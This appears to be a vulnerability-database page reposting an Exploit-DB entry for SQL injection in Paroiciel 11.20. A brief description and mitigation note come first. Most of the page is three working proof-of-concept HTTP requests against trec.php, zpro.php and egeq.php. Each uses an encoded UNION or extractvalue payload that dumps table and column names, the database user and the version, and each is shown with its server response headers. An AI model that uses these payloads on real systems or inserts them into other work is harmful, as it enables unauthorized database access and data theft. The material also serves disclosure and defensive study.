header-logo
Suggest Exploit
vendor:
Paroiciel
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Paroiciel
Affected Version From: 11.2
Affected Version To: 11.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64, Kali Linux x64
2018

Paroiciel 11.20 – ‘tRecIdListe’ SQL Injection

The Paroiciel 11.20 software is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting SQL code into the 'tRecIdListe' parameter of the 'trec.php' page. This can lead to unauthorized access to the database and potential data manipulation.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, regular security updates and patches should be applied to the software.
Source

Exploit-DB raw data:

# Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.paroiciel.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version%2011/par6lus_11_20160225.exe
# Version: 11.20
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/html/trec.php?tRecAction=P&tRecIdListe=[SQL]
# 
GET /[PATH]/html/trec.php?tRecAction=P&tRecIdListe=-1%27%20%20UNION%20SELECT%201,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),3,4,5,6,7,8,9,10,11--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:39:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

# POC: 
# 2)
# http://localhost/[PATH]/html/zpro.php?zProAction=M&zProIdPro=[SQL]
# 
GET /[PATH]/html/zpro.php?zProAction=M&zProIdPro=%2d%32%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:51:21 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

# POC: 
# 3)
# http://localhost/[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=[SQL]
# 
GET /[PATH]/html/egeq.php?eGeqActEquipe=M&eGeqIdEquipe=%27%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: paroi6l_auth=euae0ldrb8q0rrnnc017etn9l3paroiciel11; PHPSESSID=euae0ldrb8q0rrnnc017etn9l3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 23:59:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 625
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Navigation

Suggest Exploit

Services By CQR